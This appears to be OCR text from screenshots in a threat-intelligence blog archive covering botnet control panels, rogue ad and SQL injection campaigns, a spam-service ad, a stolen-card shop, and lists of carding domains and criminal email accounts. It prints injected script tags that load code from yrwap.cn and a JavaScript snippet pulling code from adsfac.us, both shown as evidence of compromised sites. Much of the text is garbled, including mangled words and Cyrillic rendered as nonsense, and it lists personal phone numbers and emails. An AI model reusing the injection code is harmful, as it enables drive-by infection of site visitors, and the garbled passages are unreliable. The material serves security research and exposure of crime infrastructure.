An image is worth a thousand words. 


Services only 


Y) Voice 


(en ee ee a Te re a 


@- iG 


Servers in 6 countries 


Welcome, 
You la 


‘ 
Last Post Threads Posts 


& SELL FRESHIEST CV¥2 USa 


[SERVICE] WMZ -> ATM Card and... 
To 


5 World Wide Dumps - The best. 


© SHIPPING LABELS SERVICE (NE 


Slorn-Napcep-Mpina-Tpad-3arpy3kn... 
by BLH 


QO athor Mode + Osrow Images ID tre to width @) 100% + 


MOD BOT viz 


Bots Mods Config 


Online B 
: tart Frame \ 
Banmngypr axKos 


He BanMgHErx aKkoB 


Cyenamio bpefimos 
HHEXKTHTCA 

Onmbxa arena nama 

Oreyrorsyror mama 


Heycranonnenno Hu 9, 


LOADER 


Load File: 
Count: 0 
Delete File 


New Fil 


BOT Vit 


Mi 


BOT STAT 
ALL ONLINE ONLINE% ALL ONLINE ONLINE % COUNTRY ALL 


Mods Config 


spam2  framer 


MOD BO 


Bots Mods 


loader spam2 framer 


S EMAIL HEADER MACR( 


FromM ail Headers Good Delete Work 


An image is worth a thousand words. 


| Set Comeemed for Mectieess } 


For DDaS A 


ie Commands 

revere: she > rey 

a deletion —> erase 
ddos ..> ddos 


Joap --» deep 


sll processes 


QuadNX Command Center 
QuadNx Botnet Detaled Ratetks TAB 
Got iP 
APG 1) 12791 


AAS) 


borne COC Server 


Server Path for Stetetcs 


Allowed User Agert 


QuadNX Command Center 


QuadNx Botnet Ostaled Statistics TAB 
tet Narre © Aelitly ‘ 
Quad wat 

(Urex]katn shutdown!!! 
KStorm sheep reddiaha! 


CCC Logs 


Eterna & 


127213 


127003 


Quack Gotret Coremand Cer 


( Quadnx 


Quadhx Settings 


jocalhost 
QUAD Igetcmd php 


quack bent 


Quad Gatnet Cormmand Center TAB 


bres ioype « Last Geen . 
fine 212139 _ 08.09.2009 
Oesd 200849_07,08 2009 
Owed 36:00:23_20,08 2009 


hewe 
Tras® Flaod 
Sw Flood 
Pebect 


Shutdown 


Cortry 
Uric 
Urieown 


Urb eon 


Prowfetch etiohred? 


© Hybrid Remote Administration Control System 


nd Control Panel | [ Hybrid Generator ] [ Dictionary File 


* Diet Mile « » Action « 


Hybrid Remote Administration Control System 


| Tenninal | [ Statistics and ¢ | Panel | [| Hybrid Generator | [ Dict y Files J [ FTP Cracking Progress 


» Hybrid Genérator 


Base Bot. Name Hybrid 
Directory to place bot: Giisiainet=)Qeliay 
Detsull Sleep Ter 0 


localhost 


60 


getcrnd php 
User Agent Hybrid_v.1.0 


‘etc! protiie 


Generate New Mybnd Bot 


d Remote Administration Control System 


sand Control Panel ][ Hybrid Generator } [ Dictionary Files | [ FTP Cmeking Progress 


» Bot IP « » Country « * Current Com mand « » Bot Name « » Bot Message « » Check« | »Action « 


© Hybrid Remote Administration Control System 


[| Tenninal | [ Statestics and Control Panel | [ Hybrid Generator | [ Dictionary Files TP Cmcking P 


» Knerypted Remote Terminal Emulator 


a) 
Set Configuration Clear 


Rogue Google AdSense Campaign - 2023-11-24 12:15 


An image is worth a thousand words. 


Google download winamp free 


Doorzoek: © het internet © pagina's in het Nederlands © pagina’s uit Nederland 


Het internet Resultaten 1 - 10 van circa 1.150.000 voor download winamp free 

Download Winamp Media Player 5.541 - Download Winamp Media Player... - [ Vertaal deze Gesponsorde links 

Download Winamp, The #1 Free Media Player. Play your MP3, AAC, MPEG, AVI files, and = 

more. Get free MP3 songs gp skins and plug-ir ins. Download Winamp} 

www.winamp.com/player - 56k - act ae na’s Nieuwe en laatste versie 2009 
Exclusieve gegarandeerde download 


Winamp Media Player - MP3, Multimedia, and Music Player - [ Vertaal deze pagina ] winamp.winamp-co.com 

eMusic Gives Winamp Users 50 Free Music Downloads +1 Free Audiobook! ... Download 

Winamp, The #1 Free Moga Player. Play your MP3, AAC, MPEG, AVI files, ... GRATIS. Muziek Downloaden 
www.winamp.com/ - 60k - he - Gelijkwaardige pagina Nieuwste Mp3 Muziek Downloads 


Meer resultaten van amp.co Snel, Veilig & 100% Legaal 
Muziek.downloadboxx.com/Mp3 


Gratis Software Site.nl - Mediaspelers > Winamp Free 


Alles wat u wilt weten over Winamp Free! ... Download sigat Free ... Download Winamp Muziek GRATIS Downloaden 
Download Winamp Lite (alleen voor esgic eh Simpel, Makkelijk en Snel 
www.gratissoftwaresite.nl/winamp.html - 21k - In cache - Gelijkwaardige pagina’s al je Favoriete Muziek Downloaden 


www.GratisMuziekDownloaden.net/mp3 
Winamp Media Player - MP3-speler, Multimediaspeler, MP3-muziek ... 


m 
bittorrent-co.com ittorrent-co.com 
bittorrent-co,.com Iphant-co,com 
bittorrent-co.com amule-co.com 


bittorrent-co.com limewire-comp.com 


bittorrent-co.com 
theplanet,com adobe-reader-co,.com 
theplanet.com adware-co,com 


flash-pl 


guitar-pro 


codec-co.com 


virtualdj-co,com 
zattoo-co,.com 
heplanet.com clonecd-co.com 
heplanet.com tuneup-co.com 
theplanet.com explorer-co.com 
wtheplanet.com iger75-co,.com 
theplan 
heplan 
heplan 


wtheplanet.com 


download ator.com 


SQL Injection Attack Campaign - 2023-11-24 12:15 


An image is worth a thousand words. 


BEAN - Seattle Cocktail Social <script src=http://yrwap.cnihjs ... 

This site may harm your computer. 

18 Sep 2008 ... <script src=http://yrwap.cn/h.js> Photo #1 - (0 comments), <script 
src=http:// yrwap.cn/h.js> Photo #2 - (0 cormments) ... 

www. beanonline. org/photos. asp?id=293 - Similar pages - 


BEAN - Seattle Cocktail Social <script src=http://yrwap.cnihjs ... 
This site may harm your computer. 

<script src=http://yrwap.cn/h.js> Photo #1 - (0 comments), <script src=http:// 
yrwap.cn/h.js> Photo #2 - (0 comments). <script src=http://yrwap.cn/h.js> ... 
www. beanonline. org/photos. asp?id=243 - Similar pages - 

More results from www. beanonline.org » 


DecentXposure ©: ThursdayEnvy Splitsscript src=http://yrwap.cnih ... 
Temporary Residence Records — 11/12/2008. | almost forgot to mention this at all , and that 
would be a pure tragedy. Thursday is back, and dare | say better... 

www. decentx.com/news.asp?id=617 - 34k - Cached - Similar pages - 


Online Branding Report<script src=http://yrwap.cnih.js></script ... 

This site may harm your computer. 

Creating a fabulous, unique product along with a companion, sharp-dressed VVeb site doesnt 
guarantee success. VVhat good are a product and a site ifno one... 

internetviz. e-seminars. biz/WVebinar/Booklnformation.asp?ID=? &source=nslr - 

Similar pages - 


leafsscript src=http-//yrwap.cnih.js></script=Products Indianleaf ... 

This site may harm your computer. 

leaf products Catalogs leaf Manufacturer Buyers Manufacturers Suppliers Importers Exporters 
Buyer. 


my.expomarkets. com/catalog-manager/productlist.asp?sscatid=507 - Similar pages - 


ST 1<script src=http://yrwap.cnih.js></script><script src=hittp ... 

Satellite TY charts all over the world from Asia, Europe, Atlantic and America. Daily updated 
satellite information. 

www. tracksat.com/satellite.asp?satelliteid=154 - 204k - Cached - Similar pages - 


Managed Spam Service - 2023-11-24 12:15 


An image is worth a thousand words. 


AOy30yCcTOMYMBbIN XOCTMHT 


hOpuguueckue 
na 1.119.000 4.000 py6. 


- CoBpemeHHbIi Codt, KOTOpbIi No3zBONAeT Ham O6xoqKTb 12.000 py6. / Bcé; 

pial @unptTpb! W Npow3B0AKTb paccbLIky MaKCHMaNbHO Ovanueckne nuyia 6.220.000 4.000py6. / 1 man. 
bICTPO. 

- CBexve 6a3bI AaHHbIX: eKeQHeBHDI C6op email agpecoBs 

AenaetT Hawn 6a3p1 @KTY@/IbHDIMK. 

- Bbictpbii crapt paccbinkn nocne 3aKka3a: Gonbwe 

HMKaKKX O4epeged! PaccbIIKa CTaptyeT B nwoG6oe yaobHoe 

juin Bac Bpema. 

- BecnnatHoe w3roTopnenne KayeCTBeHHOrO MakeTa. 

- Becnnatublii sbie3q Kypbepa 


@ Mbt npodbeccwoHanbHO 3aHKMMaeMcA— email 
PpaccbiKaMH, 3TO NOApy3amuBaet nog cobon: 


@ Yurem sce Baw nomwenanna: 


- HyKHO CflenaTb paccbinKy OT KOHpeTHOrO MMeHM - 
cnenaem. 

- PaHAOMHbIM MOOKHO CHenaTb 4TO yroqHo: TeMbI NnucbMa, 
CCbUIKH, eEMaiinbI OTNPaBHTeNned H T.n. 

- Paccbinky HyKHO 3aNyCTMTb B KOHKpeTHoe BpeMA - 
3anycmum! 

- HyKHO 4To6bI nucbMO npuxoguno B KOAMpoBKe 
onpegenexHoi Crpanbt - HeT npo6nem. 


@ Ha cerogHAWwHMH AeHbD Ka>KQbId NoONb30BaTeNb 
WHTepHeTa MMeeT KaK MMHMMyM 1 nouTOBbI AUyMK. CnaM - 
3TO CaMbIi NMpocToi MW AHOHMMHDIM KHCTpyMeHT noga4un 
wHdopmaunn. 


Paccbinka 1 MMH mucem gnMTCA oKONO 2-x 4acoB. 
Paccpinka cratyet B nto6o0e, yao6Hoe ana Bac, spema! 


gf 7 


EyeWonder iFrame Injection Attack Campaign - 2023-11-24 12:15 


An image is worth a thousand words. 


<hase href="http://www.eyewonder.com/" /><meta http-equiv="content-type" content="text/html; charset=utf-8" 


</!-- Post Click Tracking Location: EyeWonder HomePage EyeWonder HomePage --> 
<script type="text/javascript"> 

<!-- 

var dd = new Date(): 

var ord = Math.round(Math.abs(Math.sin(dd.getTime ())) *1000000000) +10000000; 


var fd_pet_sre = new String("<ser"+"ipt sre=\"http://adsfac.us/pet_mx.asp?L=235288ésource=jssord="tord+"\" t 
document.write (fd_pet_sre); 

--> 

</script> 

<noscript> 


oO" width="0" height="0" x ; et , 4 if"></iframe> 


</noscript> 

gi-=> EN} -=s 

</DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http: //www.w3. org/TR/xhktmli/DID/xhtmii-trans 
<html xmins="http://wu0.w3.org/1999/xhtml"> 


<head> 

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> 

<!-- <meta http-equiv="Content-Type" content="text/html; charset=utf-3" /> --> 

<TITLE>EyeWonder :: Interactive Digital Advertising, Rich Media Ads, Video Ads, Flash dds, Online Advertisin 


<meta name="keywords" content="eye wonder, eyewonder, eye-wonder, iwonder, rich, media, richmedia, rich medi 
<meta name="description" content="Eyelonder is Interactive Digital Advertisinglis fastest-growing innovator, 
<META HAME="PUBLISHER" CONTENT="EyelWlonder Inc."> 

<META ="COPYRIGHT" CONTENT="Copyright 2008 by EyeWonder Inc."> 

<META NAME="REVISIT-AFTER" CONTENT="7 days"> 

<META NAME="author" CONTENT="EyeWJonder Inc."> 

<META HAME="ROBOTS" COHTENT="A4LL"> 


<link href="index.css" rel="stylesheet" type="text/css" /> 
<script language="javascript">AC_FL_RunContent = 0;</seript> 


<script sre="4C RunactiveContent.js" language="javascript"></script> 
</head> 
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Wellcome, root Browsers Systems Country Referers 


country Wists | rercent | toads | ciency | Totalefficency | 
Russian Federation 1340 22.15 % 152 11.34 % 2.51 % 
Romania 917 15.16 % 167 18.21 % 2.76 % 
Unknown 687 11.36 % 95 13.83 % 1.57 % 
Spain 484 8% 64 13.22 % 1.06 % 
Ukraine 415 6.86 % 36 8.67 % 0.6 % 
Georgia 213 3.52 % 35 16.43 % 0.58 % 
Canada 174 2.88 % 1s 8.62 % 0.25 % 
Germany 141 2.33 % 13 9.22 % 0.21 % 
Mexico 128 2.12 % 18 14.06 % 0.3 % 
United Kingdom 112 1.85 % 6 5.36 % 0.1% 
Philippines 83 1.37 % 30 36.14 % 0.5 % 
Italy 82 1.36 % 10 12.2 % 0.17 % 
United States 78 1.29 % 9 11.54 % 0.15 % 
Belarus 67 1.11% 6 8.96 % 0.1% 
Venezuela 66 1.09 % 1s 22,73 % 0.25 % 
Netherlands 66 1.09 % 3 4.55 % 0.05 % 
France 59 0.98 % 2 3.39 % 0.03 % 
Moldova, Republic of 47 0.78 % id 14.89 % 0.12 % 
Australia 44 0.73 % 4 9,09 % 0.07 % 
Kazakstan 43 0.71 % 11 25.58 % 0.18 % 
India 37 0.61 % 14 37.84 % 0.23 % 
Chile 36 0.6 % 8 22.22 % 0.13 % 
Singapore 34 0.56 % 3 8.82 % 0.05 % 
Malaysia 32 0,53 % 5 15.63 % 0.08 % 
Latvia 27 0.45 % 4 14.81 % 0.07 % 
Turkey 25 041 % 5 20 % 0.08 % 
Argentina 24 04 % 4 16.67 % 0.07 % 
Brazil 24 0.4 % 6 25 % 0.1% 
Sweden 24 0.4 % a 4.17 % 0.02 % 
China 23 0.38 % 2 8.7 % 0.03 % 
Colombia 22 0.36 % 3 13.64 % 0.05 % 
Poland 21 0.35 % 4 19.05 % 0.07 % 
Israel 21 0.35 % 2 9,52 % 0.03 % 
Peru 19 0,31 % 6 31.58 % 0.1% 
Portugal 18 0,3 % Oo 0% 0% 
Thailand 18 0.3 % 6 33.33 % 0.1% 
Norway 18 0.3 % oO 0% 0% 
Hong Kong 16 0.26 % a 6.25 % 0.02 % 
Austria 16 0.26 % 3 18.75 % 0.05 % 
Dominican Republic 16 0.26 % 4 25 % 0.07 % 
Japan 15 0.25 % e 13.33 % 0.03 % 
Bulgaria 14 0.23 % oO 0% 0% 
Lithuania a3 0.21 % et 7.69 % 0.02 % 
Uzbekistan 13 0.21 % 1 7.69 % 0.02 % 
Puerto Rico 13 0.21 % o 0% 0% 
Estonia 13 0.21 % oO 0% 0% 
New Zealand 12 0.2 % o 0% 0% 
Indonesia 12 0.2 % 3 25 % 0.05 % 
Belgium 12 0.2 % oO 0% 0% 
Denmark 12 0.2 % 0 0% 0% 
Azerbaijan 11 0.18 % 2 18.18 % 0.03 % 
Ireland 11 0.18 % o 0% 0% 
Vietnam 10 0.17 % 3 30 % 0.05 % 
Morocco 9 0.15 % 3 33.33 % 0.05 % 
Czech Republic 8 0.13 % vf 12.5% 0.02 % 
Armenia 8 0.13 % 3 37.5% 0.05 % 
Egypt 8 0.13 % 5 62.5 % 0.08 % 
South Africa z 0.12 % 2 28,57 % 0.03 % 
El Salvador mz 0.12 % 2 28.57 % 0.03 % 
Switzerland 7 0.12 % o 0% 0% 
Greece 7 0.12 % a: 14.29 % 0.02 % 
Iran, Islamic Republic of 7 0.12 % 4 57.14 % 0.07 % 
Korea, Republic of z 0.12 % pt 14,29 % 0.02 % 
Bolivia 6 0.1% 3 50 % 0.05 % 
Finland b 0.08 % 2% 20 % 0.02 % 
Hungary = 0,08 % i 40 % 0.03 % 
Guatemala 4 0.07 % a 25 % 0.02 % 
Honduras 4 0.07 % o 0% 0% 
Malta 4 0.07 % o 0% 0% 
Barbados 4 0.07 % o 0% 0% 
Algeria 4 0.07 % 2 50 % 0.03 % 
Taiwan 3 0.05 % 1 33,33 % 0.02 % 
Cyprus 3 0.05 % oO 0% 0% 
Trinidad and Tobago 3 0.05 % i) 0% 0% 
Croatia 3 0.05 % £ 33.33 % 0.02 % 
Panama ms 0.05 % Oo 0% 0% 
Kyrgyzstan 3 0,05 % a 33,33 % 0.02 % 
Ecuador 3 0.05 % 1 33.33 % 0.02 % 
Nicaragua 3 0.05 % bk 33.33 % 0.02 % 
Satellite Provider 3 0.05 % i 33.33 % 0.02 % 
Bahamas 2 0.03 % oO 0% 0% 
Aruba 2 0,03 % ~ 100 % 0.03 % 
Slovakia 2 0.03 % Oo 0% 0% 
Brunei Darussalam rt 0.03 % o 0% 0% 
Antigua and Barbuda ee 0.03 % © 50 % 0.02 % 
Kuwait 2 0.03 % o 0% 0% 
Pakistan 2 0.03 % 1 50 % 0.02 % 
Bangladesh - 0.03 % 1 50 % 0.02 % 
Saudi Arabia 2 0.03 % oO 0% 0% 
American Samoa x 0,02 % 7 100 % 0.02 % 
Oman i 0,02 % a 100 % 0.02 % 
Palestinian Territory 1 0.02 % Oo 0% 0% 
Serbia %. 0.02 % o 0% 0% 
Cuba 1 0.02 % oO 0% 0% 
Turkmenistan 1 0.02 % o 0% 0% 
Uruguay 1 0.02 % 0 0% 0% 
Iceland 1 0,02 % % 100 % 0.02 % 
Costa Rica 1 0.02 % oO 0% 0% 
Iraq ry 0.02 % Oo 0% 0% 
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An image is worth a thousand words. 


fms 0 Cv nstclastmod [y]nst:changefreq [x )nst: priory 7 


http: //newsaQ9. is-the-boss. com/june-6. html 

http: //newsaQ9.is-the-boss. com/anna-hansen-wiki. html 

http: //newsaD9.is-the-boss. com/the-hangover-cast.html 

http: //newsaQ9_is-the-boss.com/you-tube. html 

http: //newsaD9_ is-the-boss. com/in-plain-sight. html 
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http://newsa09.is-the-boss. com/el-pais-berlusconi.html 
http://newsaQ9.is-the-boss. com/lg-glance. html 

http: //newsaD9 is-the-boss. com/operation-tiger html 

http: //newsaD9 is-the-boss.com/craigslist-detroit. html 

http: //newsaD9_is-the-boss. com/addicting-games. html 

http: //newsaQ9. is-the-boss. com/national-doughnut-day. html 
http: //newsaQ9. is-the-boss. com/gambar-naruto. html 

http: //news aD. is-the-boss. com/lakers-ys-magic-live-stream. html 
http://newsa09.is-the-boss.com/gnbt-stock. html 

http: //newsaD9.is-the-boss.com/michael-hutchinson. html 

http: //newsaD9_is-the-boss. com/brownish-songbird html 

http: //newsaD9._is-the-boss. com/revolver-musique. html 

http: //newsaD9_ is-the-boss.com/boyd-coddington-death. html 
http: //newsaQ9.is-the-boss. com/auschwitz-concentration-camp. html 
http://newsa09.is-the-boss. com/tagged-inc. html 

http: //newsaD9.is-the-boss. com/geert-wilders. html 

http: //newsaQ9.is-the-boss. com/hr-pufft-n-stuff. html 

http: //newsaD9._is-the-boss. com/lakers-vs-magic. html 

http: //newsaD9_is-the-boss. com/desmond-hatchett. html 

http: //newsaD9_ is-the-boss.com/kate-morgan.html 

http: //newsaD9_is-the-boss. com/kennedy-center. html 

http: //newsaQ.is-the-boss. com/cy-young. html 

http: //newsaQ9. is-the-boss. com/bbc-weather-manchester. html 
http: //newsaQ9.is-the-boss. com/lakers-vs-magic-game-1.html 
http://newsa09.is-the-boss. com/muse-tickets. html ; 
http: //newsaD9.is-the-boss. com/grand-old-days-st-paul-2009. html 
http: //newsaD9 is-the-boss.com/cell-2 html 
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http: //cnnnewsO9_is-the-boss.com/ko-yong-hui. html 

http: //cnnnewsO9_is-the-boss.com/madden-2010. html 

http: //cnnnewsO9.is-the-boss.com/lebron-james-sore-loser html 
http: //cnnnewsO9_is-the-boss com/eminem-bruno-fake. html 

http: //cnnnewsO9_is-the-boss.com/men-vs-wild-full episode. html 
http: //cnnnewsO9_is-the-boss com/holly-steele. html 

http: //cnnnewsO09.is-the-boss.com/447-victims. html 

http: //cnnnewsO9_is-the-boss com/frenchopencom html 

http: //cnnnewsO9.is-the-boss com/annie-bierman.html 

http: //cnnnewsO9_is-the-boss.com/manana-es-para-siempre html 
http://cnnnews09.is-the-boss. com/bruno-trailer. html 

http: //cnnnewsO9_is-the-boss.com/melissa-joan-hart-fat. html 
http: //cnnnewsO9_is-the-boss.com/boise-state-uniforms. html 
http: //cnnnewsO9_is-the-boss com/sandra-boss-mckinsey html 
http://cnnnews09.is-the-boss. com/nadal-girlfriend. html 

http: //cnnnewsO9_is-the-boss. com/t20-world-cup-warm-up-match html 
http: //cnnnews09.is-the-boss com/heidi-montag. html 

http: //cnnnewsO9_is-the-boss com/david-garrett-violinist html 
http: //cnnnewsO9.is-the-boss. com/earth-2100-abc. html 

http: //cnnnews09_is-the-boss com/bryce-harper-baseball. html 
http: //cnnnewsO9.is-the-boss. com/arligh-ravago. html 

http: //cnnnews09_is-the-boss com/kristen-stewart-boyfriend html 
http://cnnnewsO9. is-the-boss. com/natalvideo. html - 

http: //cnnnews09.is-the-boss com/ortega-henderson-pictures. html 
http: //cnnnewsO9.is-the-boss. com/victims-offlight-447.html 
http: //cnnnews09_is-the-boss com/benign-growth-in-mouth html 
http: //cnnnewsO9.is-the-boss. com/sean-goldman.html 

http: //cnnnewsO9.is-the-boss.com/bam-margera-divorce. html 
http: //cnnnewsO3.is-the-boss. com/david-carridine. html 

http: //cnnnewsO9.is-the-boss.com/sims-3-cheats-mac. html 
http: //cnnnewsO9.is-the-boss. com/de-thi-tot-nghiep-2009. html 
http: //cnnnewsO9.is-the-boss.com/carradine-family-actors. html 
http: //cnnnewsO9.is-the-boss. com/david-otunga-wrestling. html 
http: //cnnnewsO9.is-the-boss.com/e3-stream.html 

http: //cnnnewsO9.is-the-boss.com/89com-psp. html 
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An image is worth a thousand words. 
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dw.com.com 
wiwiw.cnet,com 
i.i.com.com 
ii.com.com 
ii.com.com 
ii.com.com 
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pn2.adserver. yahoo.com 
pn2.adserver. yahoo.com 
ii.com.com 

iL.i.com.com 
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An image is worth a thousand words. 
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Resolver Configuration 


i) Pt] Security 

Fix Insecure Permissions 
(Scripts) 

Manage SSH Keys 

Manage Wheel Group Users 
Quick Security Scan 

Scan for Trojan Horses 
Security Center 


Se Server Contacts 


Change System Mail Preferences 
Contact Manager 


& & Resellers 


Reseller Center 
Show Reseller Accounts 


ic fe | Service Configuration 


Apache Configuration 
Bandmin Password 
Configure PHP and SuExec 
Exim Configuration Editor 
FTP Server Configuration 
FTP Server Selection 
Mailserver Configuration 
Mailserver Selection 
Manage Service SSL Certificates 
Nameserver Selection 
PHP Configuration Editor 
Service Manager 

cPanel Log Rotation 
Configuration 


' Languages 
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News Change Log 


Accelera ted 


ogout (root) 


Main >> Resellers >> Show Reseller Accounts 


Reseller List 


User 


root Total: 695 accounts 
alsigns 
abarros 
abe 
absperu 
acaubet 
addyouru 
adelante 
adnan 
afair 
afius 
agecat 
agprint 
akeila 
akila 
akosh 
alankydd 
alexrail 
alfurgon 
alisa 
alltalk 


Domain 


system 

alsigns.com.au 
lepetua,com 

testl.com 
absperuconsult.com 
angelcaubet.com 
addyoururl.info 
cactuspais.uni.cc 
dylabs.vonetwork.com 
afairfight.com 
abscbnfoundation.org 
age.cat 
agprinting.com.au 
thewolfsden.net 
akila.vonetwork.com 
akosh.vonetwork.com 
alankydd.vonetwork.com 
alexrailforum.vonetwork.com 
alfurgon.vonetwork.com 
studio209mediagroup.com 
alltalk.vonetwork.com 


a [- 


cPanel 11.2¢ 


Package 


dnsoz_Host20 
vodien_CH10 
undefined 
jmedina_100 
undefined 
undefined 
undefined 
nirosh_S-25-750 
undefined 
undefined 
undefined 
dnsoz_Host20 
undefined 
nirosh_free 
nirosh_free 
nirosh_s25-500 
undefined 
nirosh_free 
undefined 
nirosh_s-25-750 |v] 


Done 
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An image is worth a thousand words. 
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HTTP/1 1 Server Too The maximum number of user reached, 
oe 


Server is too busy, please try again later... 
Busy 
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PAGE REBOOT Refreshing http:www.leader, PAGE REBOOT Refreshing http:www.presid PAGE REBOOT Refreshing http:/www.irib.ir/ ¢ PAGE REBOOT Refreshing http:/www.iribnev 


Server is too busy 
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Dancho Danchev’s Videos - 2023-11-27 20:26 


Dear blog readers, 
Find below some videos courtesy of me and stay tuned for more. 


DANCHO DANCHEV 
SPEAKS! 


The World's Most Popular and Often Cited Security Blog 
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LIVE CYBER THREAT MAP 


Dancho Danchev 

independent Contractor 
https://ddanchev. blogspot.com 
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Dancho Danchev 

independent Contractor 
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Dancho Danchev 

independent Contractor 
https://ddanchey. blogspot.com 
Emall: dancho.danchev@hush.com 
+359876893800 
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GHOST SECURITY 


GHOSTSEC TEAM MEMBERS 


AMONZEUS3 


Dancho Danchey 

independent Contractor 
https://ddanchey, blogspot.com 
Email: dancho.danchev@hush.com 
+359876893890 
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Stay tuned! 
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Email Address Accounts Known To Belong To Owners of E-Shops for Stolen 
Credit Card Details - 2023-12-01 14:14 


BINs: Last4dig: 


> 


Cards found: 840 


Country: 
(+$1) 


Bank: 


Code: 
(+$1.5) 


Level: 
(+31) 


Credit/Debit: 


Type: 


Base: 


[Any (584([»] [Any (584()%] [Any (5840) ['¥] [Any (5840) 


[z] 


[Any (5840) [ix] 


| Any 


[=] [FRESH U[y] 


04/14 


12/13 


06/13 


10/13 


08/12 


08/12 


11/13, 


03/13 


01/13 


10/18 


11/12 


401838 04/13 


NIA 


UNITED STATES 
OF AMERICA 


UNITED STATES 
OF AMERICA 


UNITED STATES 
OF AMERICA 


UNITED STATES 
OF AMERICA 


UNITED STATES 
OF AMERICA 


UNITED STATES 
OF AMERICA 


UNITED STATES 
OF AMERICA 


UNITED STATES 
OF AMERICA 


UNITED STATES 
OF AMERICA 


UNITED STATES 
OF AMERICA 


UNITED STATES 
AF AMFRICA 


UNKOWN BANK 


VYSTAR CREDIT UNION 


VYSTAR CREDIT UNION 


VYSTAR CREDIT UNION 


VYSTAR CREDIT UNION 


VYSTAR CREDIT UNION 


VYSTAR CREDIT UNION 


VYSTAR CREDIT UNION 


COMMUNITY CREDIT 


UNION 


SERVICES CREDIT 
UNION 


BRIGHTSTAR CREDIT 
UNION 


BETHPAGE FEDERAL 
CRENIT LINION 


CLASSIC 


CLASSIC 


CLASSIC 


CLASSIC 


CLASSIC 


CLASSIC 


CLASSIC 


CLASSIC 


CLASSIC 


CLASSIC 


CLASSIC 


TR2 ONLY 


TR2 ONLY 


TR2 ONLY 


TR2 ONLY 


TR2 ONLY 


TR2 ONLY 


TR2 ONLY 


TR2 ONLY 


TR2 ONLY 


TR2 ONLY 


TR2 ONLY 


TR2 ONLY 


The following are personally identifiable email address accounts including domains 
known to belong to owners of E-Shops for stolen credit card data. 


Sample domains involved include: 


ccmall.cc 
track2.name 
trackstore.su 


magic-numbers.cc 


allfresh.us 


freshstock.biz 


bulba.cc 
approven.su 
cv2shop.com 
vzone.tc 
ccStore.ru 
dumps.cc 


privateservices.ws 
perfect-numbers.cc 
mega4u.biz 

accessltd.ru 

pwnshop.cc 
bestdumps.su 

mycc.su 

bestdumps. biz 
dumpshop.bz 
cardshop.bz 
dumpscheck.com 
Sample email address accounts involved include: 
roger.sroy@yahoo[.]com 
keikomiyahara@yahoo[.]com 
bulbacc@yahoo[.]com 
yurtan20@el1[.]ru 
ccstoreru@yahoo[.]com 
persiks@online[.]Jua 
admin@accessltd[.]ru 
bestdumpssu@live[.]Jcom 
admin@mycc[.]su 
admin@bestdumps|[. ]biz 
bdsupport@jabber[.]org 
Stay tuned! 


Iran's Afkar System Yazd Co Ransomware - 2023-12-01 14:15 


The following is all the associated ransomware themed domains known to have been 


associated with Iran's Afkar System Yazd Co ransomware. 


Sample domains known to have been involved in the campaign include: 
hxxp://newdesk.top 

hxxp://onedriver-srv.ml 

hxxp://symantecserver.co 

hxxp://microsoft-updateserver.cf 

hxxp://msupdate.us 

hxxp://service-management.tk 

hxxp://aptmirror.eu 

hxxp://winstore.us 

hxxp://my-logford.ml 

hxxp://gupdate.us 

hxxp://tcp443.org 

Sample email address accounts known to have been involved in the campaign 
include: 

amirbitminer[.]gmail.com 

thund3rz[.]protonmail.com 


Email Address Accounts Known To Belong To Owners of E-Shops for Stolen 
Credit Card Details - Part Two - 2023-12-01 14:15 
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The following are personally identifiable email address accounts including domains 
known to belong to owners of E-Shops for stolen credit card data. 


Sample email address accounts include: 
admin@accessltd[.]ru 
rubensamvelich@gmail[.]Jcom 
rubensamvelich@yahoo[.]com 
bulbacc@rocketmail[.Jcom 
bulbacc@yahoo[.]com 
o0o0o.service@yahoo[.]com 
dumps.cc@safe-mail[.]net 
b2b.maxim@gmail[.]Jcom 
Ivjiecong@yahoo[.]com[.]cn 
roger.sroy@yahoo[.]com 
elche011@yahoo[.Jcom 
keikomiyahara@yahoo[.]Jcom 
dcb725@gmail[.Jcom 
wattt80@yahoo[.]com 
yurtan20@el1[.]ru 
vipforexbiz@gmail[.Jcom 
kachanaburi@yahoo[.]com 
persiks@online[.]Jua 
alexandanns@gmail[.Jcom 
bestdumpssu@live[.Jcom 
admin@mycc[.]su 
admin@bestdumps|[. ]biz 
tonchang2011@yahoo[.]Jcom 


ccstoreru@yahoo[.]com 
bdsupport@jabber[.]org 
Stay tuned! 


Cybercrime-Friendly Forum Communities - Part Two - 2023-12-01 14:16 


Cybercrime Forum 
Data Set 2021 


FULL OFFLINE COPIES OF OVER 111 PUBLICLY 

ACCESSIBLE CYBERCAIME FRIENDLY FORUM 

COMMUNITIES! LET'S SET THEM STRAIGHT! 
darcds danchens teat con 


The following is a compilation of currently active cybercrime-friendly forum 
communities. 


Cybercrime-friendly forum communities include: 
hxxp://crdforum.cc/ 

hxxp://darkwebmafias.net/ 

hxxp://darkstash.com/ 

hxxp://crdpro.cc/ 

hxxp://www.cardingclub.net/ 
hxxp://www.russiancarders.se/ 


hxxp://validmarket.io/ 
hxxp://cardingforum.cx/ 
hxxp://carding.sh/ 
hxxp://bitcarder.com 
hxxp://cardingleaks.ws/ 
hxxp://www.verifiedcarder.net/ 
hxxp://www.legitcarder.ru/ 
hxxp://www.crdworld.com/ 
hxxp://cardingmafia.to/ 
hxxp://cardingforum.cx 
hxxp://crdforum.cc 
hxxp://darkstash.com 
hxxp://carders.biz 
hxxp://crdpro.cc 
hxxp://carders.mx 
hxxp://carding-forum.com 
hxxp://crdclub.su 
hxxp://procrd.pw 
hxxp://cardmafia.cc 
hxxp://cardingforum.info 
hxxp://cardingleaks.ws 
hxxp://darkpro.net 
hxxp://crackingforum.to 
hxxp://cardingworld.ru 
hxxp://darkwebmafias.ws 
hxxp://leetforums.ru 
hxxp://legitcarders.ws 
hxxp://crdcrew.cc 
hxxp://prtship.pro 
hxxp://verifiedcarder.net 
hxxp://legitcarder.ru 
hxxp://carders.zone 
hxxp://drdark.ru 
hxxp://darknetweb.ru 
hxxp://bpcforum.ru 
hxxp://wc-club.com 
hxxp://cybercarders.com 
hxxp://bitorder.pw 


Rewards for Justice - Dancho Danchev - 2023-12-01 14:16 


The following are domains and personally identifiable information on a bulletproof 
hosting provider mentioned by the Conti Ransomware gang. 
hxxp://school-global.ru 

hxxp://youladance.ru 

Tenecou: +373 775 96666 

E-mail: info@morene[.]host 

Skype: morene[.]host 

Jabber: morene@jabber[.]morene[.]host 

ICQ: 700812649 / 702647156 

Telegram: @hostmorene 

Viber: +373 775 96666 
